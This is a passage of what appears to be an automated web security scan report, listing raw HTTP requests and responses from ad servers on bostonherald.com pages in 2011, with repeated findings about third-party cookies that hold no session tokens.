gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb780011=5_[r^208WMt+t%s!@@-#bPpSh?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP_qJUyg65S1xBWHfHSmrEEKASkNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAApQQBAgUCAAUAAAAABSGv_AAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296255616%29%3Buf%28%27r%27%2C+151403%2C+1296255616%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2811%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2887%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28619%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28620%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28621%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:43:32 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:32 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb780011=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:43:32 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb521874=5_[r^208WMM2x@N!@@-#!0*E$?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQlAPN9PjZduwj97FK5H4XrEP-6NVCCYA2IZBWHfHSmrEELEcENNAAAAANc8AwA3AQAAsQAAAAIAAAB4xgEAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAAhwQBAgUCAAUAAAAAwSGHKgAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+379%2C+1296265412%29%3Buf%28%27r%27%2C+116344%2C+1296265412%29%3B&cnd=!0RVLXwic0QEQ-IwHGAAgsr0BKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABosQE.; path=/; expires=Sun, 30-Jan-2011 01:43:32 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:32 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Fri, 29-Apr-2011 01:43:32 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 29 Jan 2011 01:43:32 GMT Content-Length: 824
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ttj?id=57040&pubclick=http://yads.zedo.com/ads2/c%3Fa=775740%3Bn=951%3Bx=2304%3Bc=951000002,951000002%3Bg=172%3Bi=6%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=6%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=6%3Bse=1%3Bk=&cb=0.14057195745408535 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb266870=5_[r^208WMuF4Lw)IE.8qu]==?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPyqFBR3BpJpcBWHfHSmrEEKwRUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEsAQBAgUCAAIAAAAAHyH9zwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254384%29%3Buf%28%27r%27%2C+151403%2C+1296254384%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2811%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2887%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28619%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28620%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28621%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:43:52 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:43:52 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb266870=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:43:52 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:43:52 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Thu, 28-Apr-2011 22:43:52 GMT; domain=.adnxs.com; HttpOnly Date: Fri, 28 Jan 2011 22:43:52 GMT Content-Length: 335
document.write('<scr' + 'ipt language=\"JavaScript\">\nvar zflag_nid=\"951\"; var zflag_cid=\"2\"; var zflag_sid=\"2\"; var zflag_width=\"300\"; var zflag_height=\"250\"; var zflag_sz=\"9\"; var zflag ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /w/click.here?cid=276818;mid=522556;m=1;sid=54393;c=0;tp=5;forced_click=\ HTTP/1.1 Host: media.fastclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; zru=1|:1294800534|; adv_ic=BxQAAAAcbUNNIAYGAAFJAACZUCAHIAtAAAIes0CAFwdDAACpSAAAYEAUIAABU2jgAS8BP17gAS8CvQ0/4AAvBBtZAAB2ICtAAAFcZ+ABLwDF4AIvAZph4AEXALDgAhcBpmDgARcBAlvgAV8B0FzgARcA/CCPwKcBCFfgARcAviBHAANAdCAAAXhL4AEXAHngAkcBXNWg1yDvAWQ44AFHAIvAvyAXAc1P4AFHAFXgAhcBR1PgAS8AJuACFwAPIHfAjwAD4AIXABjgAhcB/gyhHyBfAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwHVXOABRwCr4AIXAXlHwBcBAAA=; vt=10070:256698:477674:54816:0:1295925050:3|10991:274413:511325:54393:0:1296263251:0|; pluto=517004695355|v1; pjw=BBQAAAACIAMDClZDTSAGAQABIAMCYEUEYBMC/fcHIA2AEwEeVOABHwBfoB8A/OACHwEpU+ABHwLmLwRgRwFfzeABPwE7UeABHwRORwQAAyBXAej74AEfAUVQ4AEfBDzSAwAEIB8B+hHgAR8BbkzgAR8BLjeAXwEq3uABHwF4S+ABHwBQIJ9AxwDX4AKfAX9K4AEfAYdBgB8B9fDgAT8BlEjgAR8BWEOAHwGa9eABHwGoRuABHwFSOYAfATz54AEfARxt4AEfAiTpA2E/AMegXwAGIMsBU2jgAR8A7aEfAF2hH0AfAVxn4AEfAFegvwDUoL9AHwGaYeABHwBfoJ8AmKCfQB8BpmDgAR8AbKCfAEugn0AfAc9c4AEfAS8sgL8BS8WAv0AfAdpb4AEfAJGhHwHu8uABHwEIV+ABHwEyRIG/AFLgAn8AOuEC3wHGLoBfAXHM4AE/4QOfASk/gB8BDu3AHwEAAA==;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /w/get.media?sid=54393&tp=5&d=j&t=n HTTP/1.1 Host: media.fastclick.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; vt=10070:256698:477674:54816:0:1295925050:3|10358:244443:513092:57358:0:1296072859:0|; pjw=BAMAAAACIAMDXNVATSAGCAABAQAA/EgCACAG4AAAAAMgCQHPpqAfICwAwCAP4AMfAAYgDwDHwB8gGATrdAIAUyATwAADBgAAAA==; adv_ic=ByoAAABc1UBNIAYGAAFJAABkOCAHIAtAAAGbgOABFwGpSOABFwEes6AXAEOAFwBgQCwgAAKSDT/gAEcBsF3gAS8AvcAXIC8EG1kAAHYgK0AAAI7AFyB3AJAgF8B3AIvgAhcEzU8AAANALCAAAHfgAhcAJyBpwC8AcuACFwD84AKnAG3gAhcBdlzgAS8AaOACFwDkIHvARwBi4AIXATte4AEXAF3gAhcBLlHgARcAWuACFwEbWOABFwBV4AIXAUdT4AEXAFDgAhcAo+ECHwBG4AIXAObgAhcAReACFwElW+ABRwA84AIXAPvgAl8AN+ACFwEGTOABLwAz4AIXAdZL4AEXAC/gAhcAnuACXwAu4AIXAB/hAgcAKuACFwA34AKnACbgAhcAD+ACLwAg4AIXAALgAl8AHOACFwFVWuABjwAW4AIXAQpQ4AEXAAPgAhcAGOACXwH+DOIBbwC34AJHANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwDV4gInAM/gAhcAZeMCFwDI4AIXAR9W4AGnAMTgAhcAFeACXwC/4AIXAD/gAhcAsOACFwHbV+ABRwCr4AIXAXlH4AEXAKjgAhcAoOACRwCA4AIXAMwiDwACIytAAAI7Pz4jJSA/IuNDdwCRIAsDAAAAAA==; pluto=517004695355|v1
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /n/49881/49889/www.247realmedia.com/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&pq=%2fEN%2dUS%2f&1pixgif&referer= HTTP/1.1 Host: na.link.decdna.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Fri, 28 Jan 2011 14:16:08 GMT Server: Apache/1.3.33 (Unix) Pragma: no-cache Expires: Fri, 28 Jan 2011 14:16:08 GMT location: http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&0&pq=%2fEN%2dUS%2f&1pixgif&referer=&bounced Set-Cookie: %2edecdna%2enet/%2fn%2f49881/2/e=1296224168/49881/49889/0/0//0///0/0/0/0///0/0//0//0/0; expires=Sun, 27-Feb-2011 14:16:08 GMT; path=/n/49881; domain=.decdna.net; P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT" Set-Cookie: id=9286424825562137129; expires=Sat, 28-Jan-2012 14:16:08 GMT; path=/; domain=.decdna.net; Set-Cookie: name=9286424825511805852; path=/; domain=.decdna.net; Content-Length: 0 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1/ HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:02:21 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFL=011Pj2x3U10EfJ|U10Eo1|U10yOK|U1014lt|U10166E; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 414 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: application/x-javascript Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:03:21 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiQmF81012Mr|O1016GB; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:57:37 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O1016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3623 Content-Type: application/x-javascript Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:40 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 14:31:36 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2979 Content-Type: application/x-javascript Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 06:22:37 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:58:07 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:09 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:31:22 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:22:24 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:27:15 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:18:17 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:23:08 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O8016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:14:10 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:57:55 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O1012Mr|O2016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:57 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:02:23 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:53:25 GMT;path=/
